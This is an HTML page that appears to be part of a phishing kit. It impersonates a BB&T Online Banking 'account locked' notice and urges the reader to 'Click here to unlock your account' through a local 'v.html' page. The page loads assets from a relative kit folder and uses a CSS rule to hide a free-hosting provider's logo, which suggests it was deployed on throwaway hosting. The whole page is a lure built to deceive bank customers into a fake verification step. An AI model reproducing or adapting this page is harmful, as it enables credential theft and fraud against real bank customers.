<html class="ua-windows_nt ua-windows_nt-6 ua-windows_nt-6-1 ua-gecko ua-gecko-54 ua-gecko-54-0 ua-firefox ua-firefox-54 ua-firefox-54-0 ua-desktop ua-desktop-windows js gt-ie8"><head>
<meta charset="UTF-8">

<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">

<meta name="ROBOTS" content="NOINDEX, NOFOLLOW">

<title>
Account Locked</title>

<meta name="description" content="">

<meta name="viewport" content="initial-scale = 1, maximum-scale=2.0, user-scalable=yes">
<meta name="format-detection" content="telephone=yes">


<link href="T.goe/1.ico" rel="Shortcut Icon">
<link href="T.goe/un.css" rel="stylesheet" media="screen, print">

</head>
<body class="no-auth" id="retail-login" onkeydown="submitMeOnEnter(event)">
<input id="helpUrlId" type="hidden">
<header id="header">
<div class="cf" id="main-nav">
<div class="wrapper">

<div id="logo">
<a href="https://www.bbt.com/"><img alt="BB&amp;T Logo" src="T.goe/11.gif"></a>
</div>

<div class="pageTitle"> Online Banking </div>

</div>

</div>

</header>

<div class="retail-login exceptions" id="content-wrapper">
<strong>
</strong><div class="wrapper"><strong>

</strong><div id="page-header"><strong>

</strong><h1><font size="4">Your account has been locked</font></h1><strong>

</strong></div><strong>

</strong><section class="column-one"><strong>
</strong><article class="module"><strong>

</strong><h2><font size="3">You have exceeded the maximum number of attempts to authenticate with your credentials.</font></h2><strong>

</strong><div class="mod-content"><strong>

</strong><h2><font size="3">Please, complete verification process to unlock your account.</font></h2><font size="5">
</font><p><a class="submit-link" href="v.html"><font size="3">Click here to unlock your account</font></a></p>
<div class="clear">
</div>
</div>

</article>

<footer class="mod-footer">
</footer>

</section>
</div>

</div>

<footer id="footer">

<div class="wrapper">

<p>Online Banking Support Department</p>

<p class="footer-links"><a href="">BB&amp;T Home</a> | <a href=""> Privacy &amp; Security</a> | <a href="">Disclosures</a> </p>

<p>&#65533; 2020, Branch Banking and Trust Company. Member FDIC. All rights reserved.</p>
</div>
		
</footer>




</body><style>
    img[src*="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png"] {
display: none;}
</style></html>